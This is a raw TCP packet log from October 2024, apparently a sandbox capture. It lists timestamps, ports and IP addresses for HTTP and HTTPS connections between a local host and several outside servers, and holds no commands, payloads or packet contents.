Oct 2, 2024 09:41:05.510519028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510531902 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510531902 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510545969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510562897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510579109 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510593891 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510605097 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510605097 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510612011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510627031 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510642052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510652065 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510658026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510674953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510703087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510703087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510703087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510720015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510737896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510754108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510771036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510778904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510778904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510788918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510803938 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510821104 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510832071 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510837078 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510864019 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510879040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510893106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510893106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510904074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510921001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510934114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510948896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510963917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510978937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510978937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510978937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510998011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.511007071 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.511015892 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.511032104 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.511049986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.511058092 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.511058092 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.511066914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.511404037 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.545793056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545816898 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545834064 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545850992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545869112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545886040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.545897007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.545897007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.545907974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.546052933 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.546201944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.588747025 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588783979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588802099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588818073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588835001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588846922 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.588851929 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588871956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588886976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.588912964 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.588912964 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.589967012 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597040892 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597084999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597146034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597182035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597223043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597229958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597229958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597258091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597292900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597325087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597362995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597368002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597368002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597392082 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597563028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597596884 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597632885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597642899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597642899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597718000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597754002 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597790003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597819090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.597834110 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.597834110 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.640441895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:07.841413975 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:07.846514940 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:07.846617937 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:07.846765041 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:07.851597071 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:08.576824903 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:08.624968052 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:08.662750959 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:08.662794113 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:08.662986994 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:08.671411037 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:08.671444893 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.269637108 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.269838095 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.272053003 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.272078991 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.272603989 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.312506914 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.332214117 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.375418901 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.493647099 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.493803978 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.494106054 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.496299982 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.496332884 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.496351004 CEST	49736	443	192.168.2.4	104.237.62.213
Oct 2, 2024 09:41:09.496359110 CEST	443	49736	104.237.62.213	192.168.2.4
Oct 2, 2024 09:41:09.506161928 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:09.506247044 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:09.506334066 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:09.506675005 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:09.506731987 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:09.986181021 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:09.986277103 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:09.988408089 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:09.988419056 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:09.988759995 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:09.989917994 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:10.035403967 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:10.116765976 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:10.117050886 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:10.117136002 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:10.117242098 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:10.117271900 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:10.117299080 CEST	49737	443	192.168.2.4	34.117.59.81
Oct 2, 2024 09:41:10.117312908 CEST	443	49737	34.117.59.81	192.168.2.4
Oct 2, 2024 09:41:12.029031038 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:12.029031038 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:12.034168959 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:12.034424067 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:13.458782911 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:13.458914042 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:13.459150076 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:13.576723099 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:13.576723099 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:13.582164049 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:13.582212925 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:15.121012926 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:15.171839952 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:15.208255053 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.208403111 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.213325024 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.213392019 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.213426113 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.213494062 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.213643074 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.214256048 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.218568087 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.219168901 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.854044914 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.854119062 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.854784012 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.860644102 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.861479044 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:15.863818884 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.864429951 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:15.869362116 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056051016 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056076050 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056093931 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056108952 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056109905 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056127071 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056143999 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056159973 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056174040 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056174040 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056176901 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056194067 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056200981 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056212902 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056225061 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056243896 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056261063 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056262016 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056305885 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056324005 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056345940 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056366920 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056369066 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056385994 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056395054 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056402922 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056447029 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056473970 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056473970 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056490898 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056509018 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056549072 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.056648970 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.056821108 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.057142019 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.057184935 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.061049938 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.061111927 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.061326027 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.061376095 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146440029 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146461010 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146487951 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146495104 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146507025 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146516085 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146524906 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146534920 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146543980 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146564007 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146564960 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.146564007 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.146610022 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.147339106 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.147362947 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.147381067 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.147408009 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.147408009 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.147412062 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.147432089 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.147444010 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.147460938 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.147479057 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148078918 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148097038 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148113966 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148130894 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148144007 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148175955 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148521900 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148565054 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148569107 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148583889 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148602962 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148647070 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148653984 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148653984 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148664951 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148699999 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148715973 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148730040 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148731947 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148742914 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148753881 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148761034 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148785114 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148821115 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.148969889 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.148986101 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149015903 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149015903 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149030924 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149034023 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149060011 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149097919 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149097919 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149430990 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149477005 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149776936 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149825096 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149840117 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149856091 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149905920 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149905920 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.149947882 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.149965048 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150008917 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.150511980 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150579929 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150597095 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150650978 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150667906 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.150669098 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.150710106 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.150710106 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.151431084 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.151748896 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.223237991 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.223258972 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.223290920 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.223335981 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.232758045 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.232840061 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.232860088 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.232934952 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.237183094 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237251043 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.237261057 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237277031 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237314939 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.237323999 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237344027 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237360954 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237376928 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237384081 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.237396002 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.237416983 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.237508059 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238008022 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238023996 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238043070 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238078117 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238101959 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238111019 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238151073 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238459110 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238476038 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238492012 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238512039 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238519907 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238537073 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238540888 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238554955 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238560915 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238574028 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.238578081 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.238616943 CEST	49743	80	192.168.2.4	147.45.44.104
